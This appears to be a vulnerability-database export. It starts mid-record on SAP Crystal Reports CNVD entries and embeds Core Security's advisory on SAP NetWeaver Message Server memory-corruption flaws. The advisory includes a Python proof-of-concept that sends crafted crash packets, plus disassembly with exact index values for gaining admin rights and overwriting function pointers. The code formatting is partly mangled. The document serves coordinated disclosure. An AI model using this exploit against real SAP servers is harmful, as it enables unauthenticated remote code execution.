            "url": "https://www.cnvd.org.cn/patchInfo/show/3289"
          },
          {
            "title": "Patch for SAP Crystal Reports Server Multiple Parameter Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3287"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"DocName\\\" and \\\"Label\\\" parameter vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3293"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"defTar\\\" parameter vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3291"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"entry\\\" parameter vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3286"
          },
          {
            "title": "Patch for SAP Crystal Reports Server \\\"swf\\\" parameter vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/3288"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 5.4,
            "url": "http://secunia.com/advisories/43723/http"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1086",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1078",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1085",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1083",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1090",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1087",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1081",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1084",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "d5a6c462-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1086",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1078",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1089",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1085",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1083",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1090",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1087",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1081",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1084",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1086",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1078",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1089",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1085",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1083",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1090",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1087",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1081",
            "ident": null
          },
          {
            "date": "2011-03-15T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2011-1084",
            "ident": null
          }
        ]
      },
      "title": {
        "_id": null,
        "data": "SAP Crystal Reports Server Parameter input vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2011-1089"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "Input validation error",
        "sources": [
          {
            "db": "IVD",
            "id": "d10c1f4c-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "cfb685ec-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d2473478-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dcc32308-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "db50ddd0-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d3fbf61e-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "dfb80812-1f9b-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "d8810ba2-1f9b-11e6-abef-000c29c66e3d"
          }
        ],
        "trust": 1.6
      }
    }

    VAR-202001-0832

    Vulnerability from variot - Updated: 2026-04-10 23:58

    A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04.

    The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/

    CORE-2012-1128

    1. Advisory Information

    Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release

    1. Vulnerability Information

    Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593

    1. By sending different messages, the different vulnerabilities can be triggered.

    2. Vulnerable packages

    . Older versions are probably affected too, but they were not checked.

    1. Non-vulnerable packages

    . Vendor did not provide this information.

    1. Vendor Information, Solutions and Workarounds

    SAP released the security note 1800603 [2] regarding these issues.

    1. Credits

    Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

    1. Technical Description / Proof of Concept Code

    The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:

    /----- import socket, struct from optparse import OptionParser

    Parse the target options

    parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()

    client_string = '-'+' '39 server_name = '-'+' '39

    def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)

    def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)

    def initialize_connection(hostname, port):

    # Connect
    print "[*] Connecting to", hostname, "port", port
    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection.connect((hostname, port))
    
    # Send initialization packet
    print "[*] Conected, sending login request"
    
    init = '**MESSAGE**\x00' # eyecatcher
    init+= '\x04' # version
    init+= '\x00' # errorno
    init+= client_string # toname
    init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
    

    msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)

    # Receive response
    print "[*] Receiving login reply"
    (length, data) = receive(connection)
    
    # Parsing login reply
    server_name = data[4+64:4+64+40]
    
    return connection
    

    Main PoC body

    connection = initialize_connection(options.hostname, options.port) send_attack(connection)

    -----/

    In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.

    8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.

    The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:

    /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':

    /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...

    -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:

    /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds

    -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:

    /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends

    -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:

    /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1

    .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;


    .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;


    .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;


    .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;


    .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx

    [...]

    -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:

    /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]

    -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.

    A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:

    /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends

    -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:

    /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed

    -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':

    /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r

    -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':

    /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...

    -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.

    After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:

    1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
    2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.

    8.1.1. Gaining remote code execution by overwriting function pointers

    Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.

    One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:

    /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]

    ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER

    ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>

    [...]

    -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').

    After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:

    /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer

    -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.

    8.1.2. Modify the configuration and behavior of the server

    After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:

    1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
    2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4].

    The following python code can be used to trigger the vulnerability:

    /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd

    crash+=
    

    "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)

    print "[*] Crash sent !"
    

    -----/

    8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.

    The following python code can be used to trigger the vulnerability:

    /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd

    crash+= "AD-EYECATCH\x00"
    crash+= "\x01\x01"
    crash+= "%11d" % 104
    crash+= "%11d" % 1
    crash+= "\x15\x00\x00\x00"
    crash+= "\x20\x00\x00\xc8"
    crash+= "LALA" + ' '*(20-4)
    crash+= "LOLO" + ' '*(40-4)
    crash+= " "*36
    send_packet(connection, crash)
    
    print "[*] Crash sent !"
    

    -----/

    1. Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
    2. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.

    3. References

    [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.

    [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.

    [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.

    1. About CoreLabs

    CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

    1. About Core Security Technologies

    Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

    Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

    1. Disclaimer

    The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

